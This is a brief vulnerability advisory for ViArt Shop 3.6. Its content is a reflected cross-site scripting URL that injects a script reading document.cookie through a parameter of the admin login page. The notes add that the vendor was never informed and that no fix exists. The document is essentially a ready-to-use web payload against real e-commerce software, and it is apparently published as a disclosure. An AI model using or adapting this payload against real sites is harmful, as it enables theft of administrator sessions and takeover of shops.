Application:		ViArt Shop 3.6
Authors Site:		http://www.viart.com/

+--------------------------------------------------------------------------------------------+

[1]------------------------------------------------------------------------------------------>

XSS:

http://www.victim.com/viartshop/admin/admin_login.php?operation=login&post_data=1>"><ScRiPt>alert(document.cookie);</ScRiPt>

+-[Notes:]-----------------------------------------------------------------------------------+

Vulnerabilities found on: 01/03/2010
Author(s) Informed on: Not Informed
Author(s) Response: NA
Author(s) Fix: NA

JohnC@NoBytes.com

http://www.NoBytes.com